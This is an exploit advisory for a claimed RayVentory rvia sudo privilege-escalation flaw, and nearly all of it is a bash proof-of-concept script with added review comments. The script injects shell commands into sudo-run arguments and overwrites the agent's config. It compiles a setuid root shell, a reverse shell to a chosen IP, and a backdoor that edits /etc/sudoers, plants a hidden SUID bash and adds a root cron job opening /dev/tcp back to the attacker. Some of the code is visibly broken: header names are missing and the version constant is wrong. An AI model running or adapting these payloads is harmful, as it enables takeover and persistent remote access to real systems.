============================================================================================================================================= | # Title : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://raynet.de/ | ============================================================================================================================================= [+] Summary : A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent. The issue arises from improper validation and insufficient restriction of privileged operations when the agent is run through sudo rules. Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges. Successful exploitation could lead to full system compromise, including unauthorized modification of system files and the installation of persistence mechanisms. 
Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor [+] POC :
#!/bin/bash
# ---------------------------------------------------------------------------
# NOTE(review): proof of concept for the sudo weakness described in the
# summary above. Every path in this script depends on a sudoers entry that
# lets an unprivileged user run /opt/rvia/rvia as root while still
# controlling either its arguments or its configuration file
# (/opt/rvia/rvia.cfg): three methods inject shell metacharacters into an
# argument, two overwrite rvia.cfg and let the agent pick the values up.
#
# Artifacts this script leaves on a host (useful for detection / IR):
#   - a compiled binary and its .c source under /tmp (rootme_<pid>, see
#     PAYLOAD_NAME) and a backup directory /tmp/.rvia_backup_<pid>
#   - a rewritten /opt/rvia/rvia.cfg (restored by cleanup() if a backup exists)
#   - with -b: a line appended to /etc/sudoers, /tmp/.hidden_bash (mode 4755)
#     and a root entry appended to /etc/crontab that references /dev/tcp
# Mitigation, as the advisory states: restrict what the sudo rule for rvia
# may execute (commands and arguments) and upgrade to the vendor's fix.
# ---------------------------------------------------------------------------
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'
# NOTE(review): the title names rvia 2.6.4392.49, but this constant is
# 12.6.4392.49; combined with the "le" comparison in check_version() it
# would classify every build up to 12.6.x as vulnerable — confirm intended.
VULNERABLE_VERSION="12.6.4392.49"
TARGET_DIR="/tmp"  # not referenced anywhere below
PAYLOAD_NAME="rootme_$$" # Added PID to avoid conflict
BACKUP_DIR="/tmp/.rvia_backup_$$"
LISTENER_PORT="4444"
CVE_NUMBER="CVE-2025-69600"
REVERSE_IP=""
REVERSE_PORT="4444"
LISTENER_PID=""
CLEANUP_NEEDED=false
EXPLOIT_SUCCESS=false

#######################################
# Print usage to stdout and exit 0.
#######################################
show_help() {
  cat << EOF
Exploit for $CVE_NUMBER - RayVentory Inventory Agent
Optimized Version 3.0
Usage: $0 [options]
Options:
-c, --check Only check for vulnerability
-e, --exploit Attempt local exploitation
-r, --reverse IP Reverse Shell (Example: -r 192.168.1.100)
-p, --port PORT Port (Default: 4444)
-b, --backdoor IP Install persistent backdoor
-h, --help Show help
Examples:
$0 -c
$0 -e
$0 -r 192.168.1.100 -p 5555
$0 -b 192.168.1.100
EOF
  exit 0
}

#######################################
# Remove the temporary payload, source, config and bin directory, restore
# /opt/rvia/rvia.cfg from BACKUP_DIR when a backup exists, and stop the
# netcat listener started by the "config" method.
# Globals:  CLEANUP_NEEDED, PAYLOAD_NAME, BACKUP_DIR, LISTENER_PID (read)
# NOTE(review): always ends with `exit 0`. Because it is bound to EXIT
# below, every `exit 1` elsewhere in the script is reported to the caller
# as status 0.
#######################################
cleanup() {
  if [ "$CLEANUP_NEEDED" = true ]; then
    echo -e "\n${YELLOW}[*] Cleaning up temporary files...${NC}"
    rm -f "/tmp/$PAYLOAD_NAME" 2>/dev/null
    rm -f "/tmp/$PAYLOAD_NAME.c" 2>/dev/null
    rm -f "/tmp/malicious_$$.cfg" 2>/dev/null
    if [ -d "/tmp/bin_$$" ]; then
      rm -rf "/tmp/bin_$$" 2>/dev/null
    fi
    if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
      if [ -f "/opt/rvia/rvia.cfg" ]; then
        cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
      fi
      rm -rf "$BACKUP_DIR" 2>/dev/null
      echo -e "${GREEN}[OK] Configuration file restored${NC}"
    fi
    if [ -n "$LISTENER_PID" ] && kill -0 "$LISTENER_PID" 2>/dev/null; then
      kill "$LISTENER_PID" 2>/dev/null
      sleep 1
      kill -9 "$LISTENER_PID" 2>/dev/null
    fi
    echo -e "${GREEN}[OK] Cleanup complete${NC}"
  fi
  exit 0
}
trap cleanup SIGINT SIGTERM EXIT

#######################################
# Write a small C program to /tmp/${PAYLOAD_NAME}.c and compile it with gcc
# to /tmp/${PAYLOAD_NAME}.
# Arguments: $1 - payload type: "suid", "reverse" or "backdoor"
# Globals:   PAYLOAD_NAME, REVERSE_IP, REVERSE_PORT (read); CLEANUP_NEEDED (set)
# Returns:   0 on success; 1 on unknown type, missing IP, missing gcc or
#            compile failure
# NOTE(review): in this copy of the page the `#include` lines have lost
# their header names, so the C sources as shown will not compile.
#######################################
create_payload() {
  local payload_type=$1
  local payload_path="/tmp/${PAYLOAD_NAME}.c"
  local gcc_output
  echo -e "${BLUE}[*] Creating payload: $payload_type${NC}"
  case $payload_type in
    "suid")
      # setuid(0)/setgid(0) succeed only when the process already runs as
      # root; the program then execs bash -p. Quoted heredoc: no expansion.
      cat > "$payload_path" << 'EOF'
#include
#include
#include
int main() {
if (setuid(0) != 0) { return 1; }
if (setgid(0) != 0) { return 1; }
execl("/bin/bash", "bash", "-p", NULL);
return 0;
}
EOF
      ;;
    "reverse")
      if [ -z "$REVERSE_IP" ]; then
        echo -e "${RED}[!] Reverse shell IP not specified${NC}"
        return 1
      fi
      # Connects to REVERSE_IP:REVERSE_PORT, points stdin/stdout/stderr at
      # the socket and execs bash. Unquoted heredoc: $REVERSE_* expand here.
      cat > "$payload_path" << EOF
#include
#include
#include
#include
#include
#include
int main() {
int sock;
struct sockaddr_in server;
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) return 1;
server.sin_family = AF_INET;
server.sin_port = htons($REVERSE_PORT);
server.sin_addr.s_addr = inet_addr("$REVERSE_IP");
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) { close(sock); return 1; }
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
      ;;
    "backdoor")
      if [ -z "$REVERSE_IP" ]; then
        echo -e "${RED}[!] Backdoor IP not specified${NC}"
        return 1
      fi
      # Polls every 5 s until it runs as uid 0, then: appends a NOPASSWD
      # line to /etc/sudoers, copies /bin/bash to /tmp/.hidden_bash with
      # mode 4755, and appends a "*/5" root entry to /etc/crontab that opens
      # /dev/tcp/REVERSE_IP/REVERSE_PORT. Those three files are the
      # persistence artifacts to inspect during incident response.
      cat > "$payload_path" << EOF
#include
#include
#include
#include
int main() {
while(1) {
if (getuid() == 0) {
FILE *fp;
fp = fopen("/etc/sudoers", "a");
if (fp) { fprintf(fp, "\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\n"); fclose(fp); }
system("cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash");
system("echo '*/5 * * * * root /tmp/.hidden_bash -c \"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\"' >> /etc/crontab");
break;
}
sleep(5);
}
return 0;
}
EOF
      ;;
    *)
      echo -e "${RED}[!] Unknown payload type: $payload_type${NC}"
      return 1
      ;;
  esac
  if ! command -v gcc &> /dev/null; then
    echo -e "${RED}[!] gcc is not installed${NC}"
    return 1
  fi
  gcc_output=$(gcc -Wall "$payload_path" -o "/tmp/$PAYLOAD_NAME" 2>&1)
  if [ $? -ne 0 ]; then
    echo -e "${RED}[!] Failed to compile payload${NC}"
    echo -e "${RED}$gcc_output${NC}"
    return 1
  fi
  chmod +x "/tmp/$PAYLOAD_NAME"
  echo -e "${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}"
  CLEANUP_NEEDED=true
  return 0
}

#######################################
# Determine the installed rvia version (dpkg first, then `rvia --version`)
# and compare it with VULNERABLE_VERSION.
# Returns: 0 when dpkg says version <= VULNERABLE_VERSION, or when dpkg is
#          unavailable (then the check is skipped); 1 when not installed
#          or newer than VULNERABLE_VERSION
# NOTE(review): `dpkg -l | grep rvia` may yield several lines; the
# multi-line result is then handed to --compare-versions unchanged.
#######################################
check_version() {
  echo -e "${BLUE}[*] Checking RayVentory version...${NC}"
  local version=""
  local installed=false
  if command -v dpkg &> /dev/null; then
    version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}')
    if [ -n "$version" ]; then
      installed=true
    fi
  fi
  if [ "$installed" = false ] && [ -f "/opt/rvia/rvia" ]; then
    version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+')
    if [ -n "$version" ]; then
      installed=true
    fi
  fi
  if [ "$installed" = false ]; then
    echo -e "${RED}[!] RayVentory is not installed on the system${NC}"
    return 1
  fi
  echo -e "${GREEN}[OK] Installed version: $version${NC}"
  if command -v dpkg &> /dev/null; then
    if dpkg --compare-versions "$version" le "$VULNERABLE_VERSION" 2>/dev/null; then
      echo -e "${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}"
      return 0
    else
      echo -e "${RED}[!] Version $version is newer than the known vulnerable version${NC}"
      echo -e "${YELLOW}[!] System might not be vulnerable${NC}"
      return 1
    fi
  else
    echo -e "${YELLOW}[!] Cannot accurately verify vulnerability status${NC}"
    echo -e "${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}"
    return 0
  fi
}

#######################################
# Inspect `sudo -l` for the calling user: require that it mentions rvia and
# report which of a fixed set of patterns matches.
# Returns: 1 when sudo is missing, a password is required, or no rvia rule
#          is listed; 0 otherwise (whether or not a pattern matched)
# NOTE(review): the patterns are EREs, so `(root)` and `(ALL)` are groups
# matching the bare words "root"/"ALL" anywhere in the output; nearly any
# `sudo -l` listing matches one of them, so "exploitable" is a weak signal.
# For hardening, the sudoers rule is what to audit: it should name an exact
# command with fixed arguments rather than a wildcard.
#######################################
check_sudo() {
  echo -e "${BLUE}[*] Checking sudo privileges...${NC}"
  if ! command -v sudo &> /dev/null; then
    echo -e "${RED}[!] sudo is not installed${NC}"
    return 1
  fi
  if ! sudo -n true 2>/dev/null; then
    echo -e "${YELLOW}[!] sudo may require a password${NC}"
    echo -e "${YELLOW}[*] Please enter password if prompted${NC}"
  fi
  local sudo_config=$(sudo -l 2>&1)
  if echo "$sudo_config" | grep -q "sorry, a password is required"; then
    echo -e "${RED}[!] sudo password required but not provided${NC}"
    return 1
  fi
  if ! echo "$sudo_config" | grep -q "rvia"; then
    echo -e "${RED}[!] No sudo privileges found for rvia${NC}"
    return 1
  fi
  echo -e "${GREEN}[OK] sudo privileges exist${NC}"
  local patterns=(
    "rvia[[:space:]]*\*"
    "rvia[[:space:]]+getconfig"
    "rvia[[:space:]]+upload"
    "rvia[[:space:]]+inventory"
    "rvia[[:space:]]+oracle"
    "(root)[[:space:]]*"
    "(ALL[[:space:]]*:[[:space:]]*ALL)"
    "(ALL)[[:space:]]*"
  )
  local found=0
  for pattern in "${patterns[@]}"; do
    if echo "$sudo_config" | grep -qE "$pattern"; then
      found=1
      echo -e "${GREEN}[OK] Found exploitable pattern: $pattern${NC}"
      break
    fi
  done
  if [ $found -eq 1 ]; then
    echo -e "${GREEN}[OK] Configuration is exploitable!${NC}"
    return 0
  else
    echo -e "${YELLOW}[!] Configuration may not be directly exploitable${NC}"
    return 0
  fi
}

#######################################
# Run one injection attempt against `sudo /opt/rvia/rvia`.
# Arguments: $1 - method: getconfig | upload | inventory | oracle | config
# Globals:   PAYLOAD_NAME, BACKUP_DIR, LISTENER_PORT (read); LISTENER_PID (set)
# Side effects: backs up /opt/rvia/rvia.cfg once into BACKUP_DIR; the
#   "oracle" and "config" methods overwrite /opt/rvia/rvia.cfg; "config"
#   also starts a background netcat listener on 127.0.0.1:LISTENER_PORT.
# Detection notes: `sudo /opt/rvia/rvia` invocations whose arguments
#   contain `;` or `"` (first three methods), and modifications of
#   /opt/rvia/rvia.cfg by a non-root user (last two), are the events
#   an auditd/sudo log rule would catch.
#######################################
exploit_single_method() {
  local method=$1
  local cmd="/tmp/$PAYLOAD_NAME"
  local temp_cfg="/tmp/malicious_$$.cfg"
  echo -e "${BLUE}[*] Attempting exploit using: $method${NC}"
  if [ ! -d "$BACKUP_DIR" ] && [ -f "/opt/rvia/rvia.cfg" ]; then
    mkdir -p "$BACKUP_DIR"
    cp "/opt/rvia/rvia.cfg" "$BACKUP_DIR/" 2>/dev/null
  fi
  case $method in
    "getconfig")
      sudo /opt/rvia/rvia getconfig \";$cmd;\" 2>/dev/null
      ;;
    "upload")
      mkdir -p "/opt/rvia/results" 2>/dev/null
      touch "/opt/rvia/results/test_$$.xml" 2>/dev/null
      sudo /opt/rvia/rvia upload \"\;$cmd\;#\" 2>/dev/null
      ;;
    "inventory")
      sudo /opt/rvia/rvia inventory \";$cmd;\" 2>/dev/null
      ;;
    "oracle")
      # Points the agent's javaPaths at a directory whose "java" is a
      # symlink to the payload, via a replaced rvia.cfg.
      local bin_dir="/tmp/bin_$$"
      mkdir -p "$bin_dir" 2>/dev/null
      ln -sf "/tmp/$PAYLOAD_NAME" "$bin_dir/java" 2>/dev/null
      cat > "$temp_cfg" << EOF
javaPaths=$bin_dir/
EOF
      cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
      sudo /opt/rvia/rvia oracle test 2>/dev/null
      ;;
    "config")
      # Replaces rvia.cfg with a local configDownloadSource plus a
      # schedule:command entry, answers the download with a one-shot netcat
      # and then triggers getconfig.
      cat > "$temp_cfg" << EOF
configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious
schedule:command:$cmd * * * * *
EOF
      cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
      (
        timeout 5 nc -l -p "$LISTENER_PORT" -q 1 2>/dev/null << EOF
HTTP/1.1 200 OK
Content-Type: text/plain
malicious
EOF
      ) &
      LISTENER_PID=$!
      sleep 2
      sudo /opt/rvia/rvia getconfig 2>/dev/null
      ;;
  esac
  sleep 3
}

#######################################
# Decide whether an attempt worked: the payload file exists and carries the
# set-uid bit (test -u, then a stat -c %A fallback). On success, runs it.
# Globals: PAYLOAD_NAME (read); EXPLOIT_SUCCESS (set)
# Returns: 0 on success, 1 otherwise
# NOTE(review): nothing visible in this script sets that bit on the
# payload, so as written this check appears not to be reachable — confirm.
#######################################
check_success() {
  local payload="/tmp/$PAYLOAD_NAME"
  if [ ! -f "$payload" ]; then
    return 1
  fi
  if [ -u "$payload" ]; then
    echo -e "${GREEN}[OK] Privilege escalation successful!${NC}"
    echo -e "${GREEN}[OK] Launching root shell...${NC}"
    EXPLOIT_SUCCESS=true
    "$payload"
    return 0
  fi
  if command -v stat &> /dev/null; then
    local perms=$(stat -c "%A" "$payload" 2>/dev/null)
    if [[ $perms == *s* ]]; then
      echo -e "${GREEN}[OK] Privilege escalation successful (stat)!${NC}"
      EXPLOIT_SUCCESS=true
      "$payload"
      return 0
    fi
  fi
  return 1
}

#######################################
# Try each method in order until check_success() reports success, restoring
# rvia.cfg from the backup after every failed attempt.
# Returns: 0 if some method succeeded, 1 if all failed
#######################################
try_all_methods() {
  local methods=("getconfig" "upload" "inventory" "oracle" "config")
  local success=1
  for method in "${methods[@]}"; do
    exploit_single_method "$method"
    if check_success; then
      success=0
      break
    fi
    # Restore configuration file after each failed attempt
    if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
      cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
    fi
  done
  return $success
}

#######################################
# Build the "backdoor" payload and run try_all_methods with it.
# Globals: REVERSE_IP, REVERSE_PORT (read)
# Returns: 0 on success, 1 on missing IP or failure; no explicit status when
#          create_payload itself fails (falls through to its return code)
#######################################
install_backdoor() {
  echo -e "${BLUE}[*] Installing persistent backdoor...${NC}"
  if [ -z "$REVERSE_IP" ]; then
    echo -e "${RED}[!] Backdoor IP must be specified${NC}"
    return 1
  fi
  if create_payload "backdoor"; then
    if try_all_methods; then
      echo -e "${GREEN}[OK] Backdoor installed successfully${NC}"
      echo -e "${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}"
      return 0
    else
      echo -e "${RED}[!] Failed to install backdoor${NC}"
      return 1
    fi
  fi
}

#######################################
# Parse options, require /opt/rvia/rvia to exist, then dispatch to the
# check / backdoor / reverse / suid flows.
# Arguments: command-line options, see show_help
#######################################
main() {
  local CHECK_ONLY=false
  local EXPLOIT=false
  local BACKDOOR=false
  local REVERSE=false
  while [[ $# -gt 0 ]]; do
    case $1 in
      -c|--check)
        CHECK_ONLY=true
        shift
        ;;
      -e|--exploit)
        EXPLOIT=true
        shift
        ;;
      -r|--reverse)
        REVERSE=true
        if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
          echo -e "${RED}[!] IP required for reverse shell${NC}"
          exit 1
        fi
        REVERSE_IP="$2"
        shift 2
        ;;
      -p|--port)
        if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
          echo -e "${RED}[!] Port number required${NC}"
          exit 1
        fi
        # Digits only and within 1..65535.
        if ! [[ "$2" =~ ^[0-9]+$ ]] || [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
          echo -e "${RED}[!] Invalid port: $2${NC}"
          exit 1
        fi
        REVERSE_PORT="$2"
        shift 2
        ;;
      -b|--backdoor)
        BACKDOOR=true
        if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
          echo -e "${RED}[!] IP required for backdoor${NC}"
          exit 1
        fi
        REVERSE_IP="$2"
        shift 2
        ;;
      -h|--help)
        show_help
        ;;
      *)
        echo -e "${RED}Unknown option: $1${NC}"
        show_help
        ;;
    esac
  done
  if [ ! -f "/opt/rvia/rvia" ]; then
    echo -e "${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}"
    exit 1
  fi
  if [ "$CHECK_ONLY" = true ]; then
    check_version && check_sudo
    exit $?
  fi
  if [ "$BACKDOOR" = true ]; then
    check_version && check_sudo && install_backdoor
    exit $?
  fi
  if [ "$REVERSE" = true ]; then
    check_version && check_sudo && create_payload "reverse" && try_all_methods
    # NOTE(review): $? is 0 only when try_all_methods succeeded, and that
    # path already set EXPLOIT_SUCCESS=true, so this "failed" branch looks
    # unreachable; a failed chain exits 0 here (and cleanup() forces 0 anyway).
    if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
      echo -e "${RED}[!] Exploit failed${NC}"
      exit 1
    fi
    exit 0
  fi
  if [ "$EXPLOIT" = true ]; then
    check_version && check_sudo && create_payload "suid" && try_all_methods
    # NOTE(review): same status handling as the reverse branch above.
    if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
      echo -e "${RED}[!] Exploit failed${NC}"
      exit 1
    fi
    exit 0
  fi
  show_help
}
main "$@"
Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================